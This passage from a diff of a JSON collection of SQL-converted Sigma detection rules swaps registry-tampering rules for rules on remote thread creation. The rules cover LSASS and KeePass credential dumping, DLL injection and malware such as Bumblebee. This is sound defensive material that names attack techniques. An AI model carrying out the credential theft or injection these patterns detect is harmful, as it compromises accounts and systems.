Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml" + "filename": "create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml" }, { - "title": "Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting", - "id": "396ae3eb-4174-4b9b-880e-dc0364d78a19", + "title": "Bumblebee 
Remote Thread Creation", + "id": "994cac2b-92c2-44bf-8853-14f6ca39fbda", "status": "experimental", - "description": "Detects the modification of Outlook setting \"LoadMacroProviderOnBoot\" which if enabled allows the automatic loading of any configured VBA project/module", + "description": "Detects remote thread injection events based on action seen used by bumblebee", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\LoadMacroProviderOnBoot' ESCAPE '\\' AND NewValue LIKE '%0x00000001%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\wabmig.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" ], - "filename": "registry_set_office_outlook_enable_load_macro_provider_on_boot.yml" + "filename": "create_remote_thread_win_bumblebee.yml" }, { - "title": "COM Hijack via Sdclt", - "id": "07743f65-7ec9-404a-a519-913db7118a8d", - "status": "test", - "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", - "author": "Omkar Gudhate", + "title": "Remote Thread Creation in Suspicious Targets", + "id": "a1a144b7-5c9b-4853-a559-2172be8d4a03", + "status": "experimental", + "description": "Detects a remote thread creation in suspicious target images", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1546", - "attack.t1548" + 
"attack.t1055.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\sethc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\write.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((StartFunction = 'EtwpNotificationThread') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "registry_set_comhijack_sdclt.yml" + "filename": "create_remote_thread_win_susp_targets.yml" }, { - "title": "Running Chrome VPN Extensions via the Registry 2 VPN Extension", - "id": "b64a026b-8deb-4c1d-92fd-98893209dff1", - "status": "test", - "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", - "author": "frack113", + "title": "Remote Thread Creation Via PowerShell In Rundll32", + "id": "99b97608-3e21-4bfe-8217-2a127c396a0e", + "status": "experimental", + "description": "Detects the creation of a remote thread from a Powershell process in a rundll32 process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1133" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE 
'%Software\\\\Wow6432Node\\\\Google\\\\Chrome\\\\Extensions%' ESCAPE '\\' AND TargetObject LIKE '%update\\_url' ESCAPE '\\' AND EventType = 'SetValue' AND (TargetObject LIKE '%fdcgdnkidjaadafnichfpabhfomcebme%' ESCAPE '\\' OR TargetObject LIKE '%fcfhplploccackoneaefokcmbjfbkenj%' ESCAPE '\\' OR TargetObject LIKE '%bihmplhobchoageeokmgbdihknkjbknd%' ESCAPE '\\' OR TargetObject LIKE '%gkojfkhlekighikafcpjkiklfbnlmeio%' ESCAPE '\\' OR TargetObject LIKE '%jajilbjjinjmgcibalaakngmkilboobh%' ESCAPE '\\' OR TargetObject LIKE '%gjknjjomckknofjidppipffbpoekiipm%' ESCAPE '\\' OR TargetObject LIKE '%nabbmpekekjknlbkgpodfndbodhijjem%' ESCAPE '\\' OR TargetObject LIKE '%kpiecbcckbofpmkkkdibbllpinceiihk%' ESCAPE '\\' OR TargetObject LIKE '%nlbejmccbhkncgokjcmghpfloaajcffj%' ESCAPE '\\' OR TargetObject LIKE '%omghfjlpggmjjaagoclmmobgdodcjboh%' ESCAPE '\\' OR TargetObject LIKE '%bibjcjfmgapbfoljiojpipaooddpkpai%' ESCAPE '\\' OR TargetObject LIKE '%mpcaainmfjjigeicjnlkdfajbioopjko%' ESCAPE '\\' OR TargetObject LIKE '%jljopmgdobloagejpohpldgkiellmfnc%' ESCAPE '\\' OR TargetObject LIKE '%lochiccbgeohimldjooaakjllnafhaid%' ESCAPE '\\' OR TargetObject LIKE '%nhnfcgpcbfclhfafjlooihdfghaeinfc%' ESCAPE '\\' OR TargetObject LIKE '%ookhnhpkphagefgdiemllfajmkdkcaim%' ESCAPE '\\' OR TargetObject LIKE '%namfblliamklmeodpcelkokjbffgmeoo%' ESCAPE '\\' OR TargetObject LIKE '%nbcojefnccbanplpoffopkoepjmhgdgh%' ESCAPE '\\' OR TargetObject LIKE '%majdfhpaihoncoakbjgbdhglocklcgno%' ESCAPE '\\' OR TargetObject LIKE '%lnfdmdhmfbimhhpaeocncdlhiodoblbd%' ESCAPE '\\' OR TargetObject LIKE '%eppiocemhmnlbhjplcgkofciiegomcon%' ESCAPE '\\' OR TargetObject LIKE '%cocfojppfigjeefejbpfmedgjbpchcng%' ESCAPE '\\' OR TargetObject LIKE '%foiopecknacmiihiocgdjgbjokkpkohc%' ESCAPE '\\' OR TargetObject LIKE '%hhdobjgopfphlmjbmnpglhfcgppchgje%' ESCAPE '\\' OR TargetObject LIKE '%jgbaghohigdbgbolncodkdlpenhcmcge%' ESCAPE '\\' OR TargetObject LIKE '%inligpkjkhbpifecbdjhmdpcfhnlelja%' ESCAPE '\\' OR TargetObject LIKE 
'%higioemojdadgdbhbbbkfbebbdlfjbip%' ESCAPE '\\' OR TargetObject LIKE '%hipncndjamdcmphkgngojegjblibadbe%' ESCAPE '\\' OR TargetObject LIKE '%iolonopooapdagdemdoaihahlfkncfgg%' ESCAPE '\\' OR TargetObject LIKE '%nhfjkakglbnnpkpldhjmpmmfefifedcj%' ESCAPE '\\' OR TargetObject LIKE '%jpgljfpmoofbmlieejglhonfofmahini%' ESCAPE '\\' OR TargetObject LIKE '%fgddmllnllkalaagkghckoinaemmogpe%' ESCAPE '\\' OR TargetObject LIKE '%ejkaocphofnobjdedneohbbiilggdlbi%' ESCAPE '\\' OR TargetObject LIKE '%keodbianoliadkoelloecbhllnpiocoi%' ESCAPE '\\' OR TargetObject LIKE '%hoapmlpnmpaehilehggglehfdlnoegck%' ESCAPE '\\' OR TargetObject LIKE '%poeojclicodamonabcabmapamjkkmnnk%' ESCAPE '\\' OR TargetObject LIKE '%dfkdflfgjdajbhocmfjolpjbebdkcjog%' ESCAPE '\\' OR TargetObject LIKE '%kcdahmgmaagjhocpipbodaokikjkampi%' ESCAPE '\\' OR TargetObject LIKE '%klnkiajpmpkkkgpgbogmcgfjhdoljacg%' ESCAPE '\\' OR TargetObject LIKE '%lneaocagcijjdpkcabeanfpdbmapcjjg%' ESCAPE '\\' OR TargetObject LIKE '%pgfpignfckbloagkfnamnolkeaecfgfh%' ESCAPE '\\' OR TargetObject LIKE '%jplnlifepflhkbkgonidnobkakhmpnmh%' ESCAPE '\\' OR TargetObject LIKE '%jliodmnojccaloajphkingdnpljdhdok%' ESCAPE '\\' OR TargetObject LIKE '%hnmpcagpplmpfojmgmnngilcnanddlhb%' ESCAPE '\\' OR TargetObject LIKE '%ffbkglfijbcbgblgflchnbphjdllaogb%' ESCAPE '\\' OR TargetObject LIKE '%kcndmbbelllkmioekdagahekgimemejo%' ESCAPE '\\' OR TargetObject LIKE '%jdgilggpfmjpbodmhndmhojklgfdlhob%' ESCAPE '\\' OR TargetObject LIKE '%bihhflimonbpcfagfadcnbbdngpopnjb%' ESCAPE '\\' OR TargetObject LIKE '%ppajinakbfocjfnijggfndbdmjggcmde%' ESCAPE '\\' OR TargetObject LIKE '%oofgbpoabipfcfjapgnbbjjaenockbdp%' ESCAPE '\\' OR TargetObject LIKE '%bhnhkdgoefpmekcgnccpnhjfdgicfebm%' ESCAPE '\\' OR TargetObject LIKE '%knmmpciebaoojcpjjoeonlcjacjopcpf%' ESCAPE '\\' OR TargetObject LIKE '%dhadilbmmjiooceioladdphemaliiobo%' ESCAPE '\\' OR TargetObject LIKE '%jedieiamjmoflcknjdjhpieklepfglin%' ESCAPE '\\' OR TargetObject LIKE '%mhngpdlhojliikfknhfaglpnddniijfh%' 
ESCAPE '\\' OR TargetObject LIKE '%omdakjcmkglenbhjadbccaookpfjihpa%' ESCAPE '\\' OR TargetObject LIKE '%npgimkapccfidfkfoklhpkgmhgfejhbj%' ESCAPE '\\' OR TargetObject LIKE '%akeehkgglkmpapdnanoochpfmeghfdln%' ESCAPE '\\' OR TargetObject LIKE '%gbmdmipapolaohpinhblmcnpmmlgfgje%' ESCAPE '\\' OR TargetObject LIKE '%aigmfoeogfnljhnofglledbhhfegannp%' ESCAPE '\\' OR TargetObject LIKE '%cgojmfochfikphincbhokimmmjenhhgk%' ESCAPE '\\' OR TargetObject LIKE '%ficajfeojakddincjafebjmfiefcmanc%' ESCAPE '\\' OR TargetObject LIKE '%ifnaibldjfdmaipaddffmgcmekjhiloa%' ESCAPE '\\' OR TargetObject LIKE '%jbnmpdkcfkochpanomnkhnafobppmccn%' ESCAPE '\\' OR TargetObject LIKE '%apcfdffemoinopelidncddjbhkiblecc%' ESCAPE '\\' OR TargetObject LIKE '%mjolnodfokkkaichkcjipfgblbfgojpa%' ESCAPE '\\' OR TargetObject LIKE '%oifjbnnafapeiknapihcmpeodaeblbkn%' ESCAPE '\\' OR TargetObject LIKE '%plpmggfglncceinmilojdkiijhmajkjh%' ESCAPE '\\' OR TargetObject LIKE '%mjnbclmflcpookeapghfhapeffmpodij%' ESCAPE '\\' OR TargetObject LIKE '%bblcccknbdbplgmdjnnikffefhdlobhp%' ESCAPE '\\' OR TargetObject LIKE '%aojlhgbkmkahabcmcpifbolnoichfeep%' ESCAPE '\\' OR TargetObject LIKE '%lcmammnjlbmlbcaniggmlejfjpjagiia%' ESCAPE '\\' OR TargetObject LIKE '%knajdeaocbpmfghhmijicidfcmdgbdpm%' ESCAPE '\\' OR TargetObject LIKE '%bdlcnpceagnkjnjlbbbcepohejbheilk%' ESCAPE '\\' OR TargetObject LIKE '%edknjdjielmpdlnllkdmaghlbpnmjmgb%' ESCAPE '\\' OR TargetObject LIKE '%eidnihaadmmancegllknfbliaijfmkgo%' ESCAPE '\\' OR TargetObject LIKE '%ckiahbcmlmkpfiijecbpflfahoimklke%' ESCAPE '\\' OR TargetObject LIKE '%macdlemfnignjhclfcfichcdhiomgjjb%' ESCAPE '\\' OR TargetObject LIKE '%chioafkonnhbpajpengbalkececleldf%' ESCAPE '\\' OR TargetObject LIKE '%amnoibeflfphhplmckdbiajkjaoomgnj%' ESCAPE '\\' OR TargetObject LIKE '%llbhddikeonkpbhpncnhialfbpnilcnc%' ESCAPE '\\' OR TargetObject LIKE '%pcienlhnoficegnepejpfiklggkioccm%' ESCAPE '\\' OR TargetObject LIKE '%iocnglnmfkgfedpcemdflhkchokkfeii%' ESCAPE '\\' OR TargetObject LIKE 
'%igahhbkcppaollcjeaaoapkijbnphfhb%' ESCAPE '\\' OR TargetObject LIKE '%njpmifchgidinihmijhcfpbdmglecdlb%' ESCAPE '\\' OR TargetObject LIKE '%ggackgngljinccllcmbgnpgpllcjepgc%' ESCAPE '\\' OR TargetObject LIKE '%kchocjcihdgkoplngjemhpplmmloanja%' ESCAPE '\\' OR TargetObject LIKE '%bnijmipndnicefcdbhgcjoognndbgkep%' ESCAPE '\\' OR TargetObject LIKE '%lklekjodgannjcccdlbicoamibgbdnmi%' ESCAPE '\\' OR TargetObject LIKE '%dbdbnchagbkhknegmhgikkleoogjcfge%' ESCAPE '\\' OR TargetObject LIKE '%egblhcjfjmbjajhjhpmnlekffgaemgfh%' ESCAPE '\\' OR TargetObject LIKE '%ehbhfpfdkmhcpaehaooegfdflljcnfec%' ESCAPE '\\' OR TargetObject LIKE '%bkkgdjpomdnfemhhkalfkogckjdkcjkg%' ESCAPE '\\' OR TargetObject LIKE '%almalgbpmcfpdaopimbdchdliminoign%' ESCAPE '\\' OR TargetObject LIKE '%akkbkhnikoeojlhiiomohpdnkhbkhieh%' ESCAPE '\\' OR TargetObject LIKE '%gbfgfbopcfokdpkdigfmoeaajfmpkbnh%' ESCAPE '\\' OR TargetObject LIKE '%bniikohfmajhdcffljgfeiklcbgffppl%' ESCAPE '\\' OR TargetObject LIKE '%lejgfmmlngaigdmmikblappdafcmkndb%' ESCAPE '\\' OR TargetObject LIKE '%ffhhkmlgedgcliajaedapkdfigdobcif%' ESCAPE '\\' OR TargetObject LIKE '%gcknhkkoolaabfmlnjonogaaifnjlfnp%' ESCAPE '\\' OR TargetObject LIKE '%pooljnboifbodgifngpppfklhifechoe%' ESCAPE '\\' OR TargetObject LIKE '%fjoaledfpmneenckfbpdfhkmimnjocfa%' ESCAPE '\\' OR TargetObject LIKE '%aakchaleigkohafkfjfjbblobjifikek%' ESCAPE '\\' OR TargetObject LIKE '%dpplabbmogkhghncfbfdeeokoefdjegm%' ESCAPE '\\' OR TargetObject LIKE '%padekgcemlokbadohgkifijomclgjgif%' ESCAPE '\\' OR TargetObject LIKE '%bfidboloedlamgdmenmlbipfnccokknp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" ], - "filename": "registry_set_chrome_extension.yml" + "filename": "create_remote_thread_win_powershell_crt_rundll32.yml" }, { - "title": "Outlook EnableUnsafeClientMailRules Setting Enabled - Registry", - "id": 
"6763c6c8-bd01-4687-bc8d-4fa52cf8ba08", - "status": "experimental", - "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CreateRemoteThread API and LoadLibrary", + "id": "052ec6f6-1adc-41e6-907a-f1c813478bee", + "status": "test", + "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (StartModule LIKE '%\\\\kernel32.dll' ESCAPE '\\' AND StartFunction = 'LoadLibraryA')" ], - "filename": "registry_set_office_outlook_enable_unsafe_client_mail_rules.yml" + "filename": "create_remote_thread_win_loadlibrary.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - Registry", - "id": "6597be7b-ac61-4ac8-bef4-d3ec88174853", + "title": "CACTUSTORCH Remote Thread Creation", + "id": "2e4e488a-6164-4811-9ea1-f960c7359c40", "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects remote thread creation from CACTUSTORCH as described in references.", + "author": "@SBousseaden (detection), Thomas Patzke (rule)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1055.012", + "attack.execution", + "attack.t1059.005", + 
"attack.t1059.007", + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Root\\\\InventoryApplicationFile\\\\winsat.exe|%' ESCAPE '\\' AND TargetObject LIKE '%\\\\LowerCaseLongPath' ESCAPE '\\' AND NewValue LIKE 'c:\\\\users\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\appdata\\\\local\\\\temp\\\\system32\\\\winsat.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\System32\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\wscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' AND StartModule = '')" ], - "filename": "registry_set_uac_bypass_winsat.yml" + "filename": "create_remote_thread_win_cactustorch.yml" }, { - "title": "Potential Persistence Via AutodialDLL", - "id": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", + "title": "KeePass Password Dumping", + "id": "77564cc2-7382-438b-a7f6-395c2ae53b9a", "status": "experimental", - "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity", + "author": "Timon Hackenjos", "tags": [ - "attack.persistence" + "attack.credential_access", + "attack.t1555.005" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 
'%\\\\Services\\\\WinSock2\\\\Parameters\\\\AutodialDLL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE TargetImage LIKE '%\\\\KeePass.exe' ESCAPE '\\'" ], - "filename": "registry_set_persistence_autodial_dll.yml" + "filename": "create_remote_thread_win_password_dumper_keepass.yml" }, { - "title": "Potential Attachment Manager Settings Attachments Tamper", - "id": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", + "title": "Suspicious Remote Thread Source", + "id": "66d31e5f-52d6-40a4-9615-002d3789a119", "status": "experimental", - "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", + "author": "Perez Diego (@darkquassar), oscd.community", "tags": [ - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Attachments\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\HideZoneInfoOnProperties' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR (TargetObject LIKE '%\\\\SaveZoneInformation' ESCAPE '\\' AND NewValue = 'DWORD (0x00000002)') OR (TargetObject LIKE '%\\\\ScanWithAntiVirus' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')))" + 
"SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\bash.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cvtres.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\defrag.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dnx.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\expand.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\find.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\findstr.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\hh.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\installutil.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\lync.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\makecab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mDNSResponder.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ping.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\provtool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\python.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\runonce.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\sapcimc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\tstheme.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR SourceImage LIKE 
'%\\\\vssadmin.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winscp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND NOT ((SourceImage LIKE '%Visual Studio%' ESCAPE '\\' OR SourceParentImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND TargetParentImage = 'System' AND TargetParentProcessId = '4') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\provtool.exe' ESCAPE '\\' AND TargetParentProcessId = '0') OR (SourceImage LIKE '%\\\\git.exe' ESCAPE '\\' AND (TargetImage LIKE '%\\\\git.exe' ESCAPE '\\' OR TargetImage LIKE '%C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\VSSVC.exe' ESCAPE '\\' AND TargetImage = 'System') OR (SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\schtasks.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\NVIDIA Corporation\\\\NVIDIA GeForce Experience\\\\NVIDIA GeForce Experience.exe' ESCAPE '\\')))" ], - "filename": "registry_set_policies_attachments_tamper.yml" + "filename": 
"create_remote_thread_win_susp_remote_thread_source.yml" }, { - "title": "Lsass Full Dump Request Via DumpType Registry Settings", - "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f719", - "status": "experimental", - "description": "Detects the setting of the \"DumpType\" registry value to \"2\" which stands for a \"Full Dump\". Technique such as LSASS Shtinkering requires this value to be \"2\" in order to dump LSASS.", - "author": "@pbssubhash", + "title": "Password Dumper Remote Thread in LSASS", + "id": "f239b326-2f41-4d6b-9dfa-c846a60ef505", + "status": "stable", + "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. A single execution can lead to hundreds of events.\n", + "author": "Thomas Patzke", "tags": [ "attack.credential_access", + "attack.s0005", "attack.t1003.001" ], "falsepositives": [ - "Legitimate application that needs to do a full dump of their process" + "Antivirus products" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\lsass.exe\\\\DumpType%' ESCAPE '\\') AND NewValue = 'DWORD (0x00000002)')" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND StartModule = '')" ], - "filename": "registry_set_lsass_usermode_dumping.yml" + "filename": "create_remote_thread_win_password_dumper_lsass.yml" }, { - "title": "New File Association Using Exefile", - "id": "44a22d59-b175-4f13-8c16-cbaef5b581ff", + "title": "DNS Server Error Failed Loading the ServerLevelPluginDLL", + "id": 
"cbe51394-cd93-4473-b555-edf0144952d9", "status": "test", - "description": "Detects the abuse of the exefile handler in new file association. Used for bypass of security products.", - "author": "Andreas Hunkeler (@Karneades)", + "description": "Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%Classes\\\\.%' ESCAPE '\\' AND NewValue = 'exefile' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (Channel = 'DNS Server' AND EventID IN ('150', '770', '771'))" ], - "filename": "registry_set_file_association_exefile.yml" + "filename": "win_dns_server_susp_server_level_plugin_dll.yml" }, { - "title": "Windows Defender Service Disabled", - "id": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", + "title": 